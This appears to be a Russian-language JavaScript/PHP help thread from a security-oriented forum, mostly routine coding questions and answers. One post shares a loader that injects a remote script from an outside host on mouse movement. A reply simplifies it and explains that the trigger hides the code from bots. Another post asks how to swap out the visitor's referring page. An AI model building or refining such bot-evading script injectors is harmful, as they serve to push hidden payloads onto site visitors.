[JavaScript, AJAX] Задай вопрос, получи ответ

Discussion in 'PHP' started by banned, 9 Jun 2007.

Thread Status:
Not open for further replies.
  1. Cowboyl0l

    Cowboyl0l New Member

    Joined:
    19 Nov 2011
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    PHP:
    while ($p <= $zara)
    {
    $pip "<script type='text/javascript'>
       document.close;
    document.write('');
    </script>"
    ;
    echo 
    "$p/$zara"
    echo 
    $pip;
    ob_flush();
    flush();
    $p++;
    }
    как очистить экран? этот способ не работает, clear() тоже, подскажите как это можно решить?
     
  2. FindeR

    FindeR Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    623
    Likes Received:
    138
    Reputations:
    20
    Code:
    document.getElementsByTagName['BODY'][0].innerHTML = '';
    
     
  3. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    910
    Likes Received:
    468
    Reputations:
    723
    document.body.value='';
     
    _________________________
  4. Cowboyl0l

    Cowboyl0l New Member

    Joined:
    19 Nov 2011
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    хм, оба решения не работают... возможно из за того что в php скрипте выводит только числа, тегов <body> там нет.
    даже выводят так
    echo "<body>$p/$zara</body>";
    не работает :(
     
  5. jobs9791

    jobs9791 New Member

    Joined:
    13 Jan 2011
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    нужно подробное описание декомпиляции JAR архива в исходный код так чтобы его потом можно было изменить и скомпилировать
     
  6. scanislav

    scanislav Elder - Старейшина

    Joined:
    25 Jun 2010
    Messages:
    88
    Likes Received:
    22
    Reputations:
    31
    http://stackoverflow.com/questions/6157929/how-to-simulate-mouse-click-using-javascript
     
  7. justonline

    justonline network ninja

    Joined:
    27 Jul 2011
    Messages:
    532
    Likes Received:
    61
    Reputations:
    53
    Code:
    (function() {
    	var url = 'http://test1.ru/';
    	
    	
    	
    	document.onmousemove = function() {
    		
    			var head = document.getElementsByTagName('head')[0];
    			var script = document.createElement('script');
    			script.type = 'text/javascript';
    			script.src = url + '23.js';
    			head.appendChild(script);
    		
    	};
    })();
    
    Подскажите как убрать онмаусмув с этого скрипта не теряя работоспособности? тупо вызов функции без свистоперделок
     
  8. scanislav

    scanislav Elder - Старейшина

    Joined:
    25 Jun 2010
    Messages:
    88
    Likes Received:
    22
    Reputations:
    31
    Без наворотов код выглядел бы так:

    Code:
    (function() {
    var url = 'http://test1.ru/';
    var head = document.getElementsByTagName('head')[0];
    var script = document.createElement('script');
    script.type = 'text/javascript';
    script.src = url + '23.js';
    head.appendChild(script);
    		
    })();
    ЗЫ:Еще в исходном коде присутствует баг - он не проверяет, что скрипт http://test.ru/23.js уже добавлен, и дописывает его к странице при каждом движении мыши. Надо либо сбрасывать обработчик mousemove в конце, либо как-то проверять, что скрипт уже присутствует.

    ЗЗЫ: onmousemove здесь нужен для скрытия кода от ботов - боты (из тех, что попроще) мышкой не двигают.
     
  9. fairtools

    fairtools New Member

    Joined:
    21 Sep 2012
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    прошу помощи вот с этим вопросом http://forum.antichat.ru/thread352369.html
     
  10. Relium

    Relium Banned

    Joined:
    2 Jun 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    вывод

    Здравствуйте, вот у меня есть код:
    PHP:
    <style>
    #qqq{
    <span class="highlight">margin</span>:0 500;
    }
    </
    style>
    <
    script type="text/javascript">
    onload = function () {

      var 
    1element document.getElementById('qqq');

      
    setInterval(function(){
          
    element.style.margin x++ + 'px 50% 0';
          if(
    300element.style.margin '300px 50% 0';
      }, 
    16)
    }
    </script>
    <div id="qqq">111
    </div>
    , вот тут javascript, мне друзья подсказали что нужно каким то образом изменить javascript чтоб текст тупо не выезжал с центра верхнего экрана на середину, а чтоб при наведении там например на кнопочку только начал выезжать, вот не подскажете как? если не туда обратился, укажите пожалуйста куда надо было, взарания благадарен.. :confused:
     
  11. Donet

    Donet New Member

    Joined:
    11 Apr 2011
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Если надо софт на программирования пишите цены лояльные http://vk.com/speedsoft
     
  12. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    147
    Likes Received:
    38
    Reputations:
    5
    Помогите пожалуйста! Не могу понять как сделать это на Javascript.
    Создать функцию no_zeros (), аргументом которой является массив чисел, а результатом действия - модифицированный входной массив, не содержащий нулевых значений.
    Отблагодарю
     
  13. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,759
    Likes Received:
    816
    Reputations:
    230
    Code:
    function yoba(arg)
    {
        if(arg instanceof Array)
            for(var i = 0; i < arg.length; i++)
                if(arg[i] == 0)
                    arg.splice(i, 1);
                    
        return arg;
    }
    
    var list = [5, 2, 0, 1, 0];
    alert(yoba(list));
    
     
    _________________________
    2 people like this.
  14. Exompies

    Exompies Member

    Joined:
    14 Oct 2011
    Messages:
    0
    Likes Received:
    9
    Reputations:
    1
    Сделать полоску загрузки ProgressBar
    без раширение uploadprogress_get_info так как его нет на хосте(
    возможно сделать через Php+ajax jquery

    исходник здесь

    не работает вовсех версиях Internet Explorer :(
     
  15. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    126
    Likes Received:
    22
    Reputations:
    11
    Суть: есть сайт со статистиками в виде таблицы, но он не удобен,так как для подробной статистики каждой строки таблицы нужно открыть лишнее окно и смотреть там, надоедает при частом обращении к сайту. В JS я полный ноль, хотел запилить скриптик и загнать его в адд-он firefox'а. Насколько я понял, благодаря document.getElements можно точно найти требуемое значение в исходнике страницы.. Вопрос, как в js заставить скрипт обратиться к одной странице, вытащить оттуда нужное значение и вставить в другую? По-моему, задача вполне простая, но мб это и не так. Заранее спасибо за помощь.
     
  16. scanislav

    scanislav Elder - Старейшина

    Joined:
    25 Jun 2010
    Messages:
    88
    Likes Received:
    22
    Reputations:
    31
    В последних браузерах, поддерживающих Javascript 1.6, делается в одну строчку:

    Code:
    function no_zeros(arr) {
      return arr.filter(function(x){return x!=0;});
    }
    
     
    1 person likes this.
  17. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    147
    Likes Received:
    38
    Reputations:
    5
    Спасибо большое.
    Если не трудно-посмотрите в чем ошибка, уже целый день мучаюсь.
    PHP:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <
    html xmlns="http://www.w3.org/1999/xhtml">
    <
    head>

        <
    title>Лаба </title>

    <
    script type="text/javascript" src="js/jquery.validate.min.js"></script>
    <script type="text/javascript" src="js/jquery-1.5.2.min.js"></script>
    <style type="text/css">
    body {
      font-family: Arial, Helvetica, sans-serif;
      font-size:10pt;
    }

    .lab {
      text-align: right;
      width: 100px;
      display: block;
      float: left;
    }

    input {
      margin-left: 10px;
    }

    label.error {
      color: red;
      font-style: italic;
      margin-left: 5px;
    }

    input.error {
      border: 1px dotted red;
    }
    </style>

    </head>
    <body>

    <script type="text/javascript">
    $().ready(function() {
      $("myform").validate({
        rules: {
          im: {
            required: true,
            rangelength: [5, 20]
          },
           pr: {
            required: true,
            rangelength: [5, 20]
          },
          misto: "required",
         
          country: "required",
          
          index: {
          required: true,
          rangelength: [5, 5]
          },
          email: {
            required: true,
            email: true
          }
        
            },
        messages: {
         im: {
            required: "Ви повинні ввести значення",
            rangelength: "Довжина імені має бути від 5 до 20 символів"
          },
           pr: {
            required: "Ви повинні ввести значення",
            rangelength: "Довжина прізвища має бути від 5 до 20 символів"
          },
          misto: {
            required: "Ви повинні ввести значення",
          },
          country: {
          required: "Ви повинні ввести значення",
          },
          index: {
          required: "Ви повинні ввести значення",
          rangelength: "Довжина індексу має бути 5 символів"
          },
          email: {
            required: "Ви повинні ввести значення",
            email: "Введіть коректний e-mail адрес"
          }
            
        }
      });
      
    });
    </script>

    <form id="myform" action="#" method="post">
      <label class="lab" for="im">Ім'я: </label>
      <input type="text" name="im" id="im" value="" class="required"><br>
      <label class="lab" for="pr">Прізвище: </label>
      <input type="text" name="pr" id="pr" value="" class="required"><br>
      <label class="lab" for="misto">Місто: </label>
      <input type="text" name="misto" id="misto" value="" class="required"><br>
      <label class="lab" for="country">Країна: </label>
      <input type="text" name="country" id="country" value="" class="required"><br>
      <label class="lab" for="index">Індекс: </label>
      <input type="text" name="index" id="index" value="" class="required"><br>
      <label class="lab" for="email">E-mail: </label>
      <input type="text" name="email" id="email" value="" class="required email"><br>
      <input type="submit" name="submit" value="Відправити">
    </form>
    </body>
    </html>
     
    #3557 moodoone, 1 Oct 2012
    Last edited: 1 Oct 2012
  18. LStr1ke

    LStr1ke Elder - Старейшина

    Joined:
    29 Jul 2009
    Messages:
    795
    Likes Received:
    140
    Reputations:
    73
    PHP:
    $("#myform").validate({ ...
     
    1 person likes this.
  19. bosko

    bosko New Member

    Joined:
    23 Sep 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
  20. foxxx1234

    foxxx1234 Member

    Joined:
    26 Nov 2008
    Messages:
    0
    Likes Received:
    7
    Reputations:
    0
    Подскажите как заменить страницу с которой перешли на сайт. Например переходят на сайт sait.ru с google.com, так страницу google.com заменить на sait1.ru
     
Loading...
Thread Status:
Not open for further replies.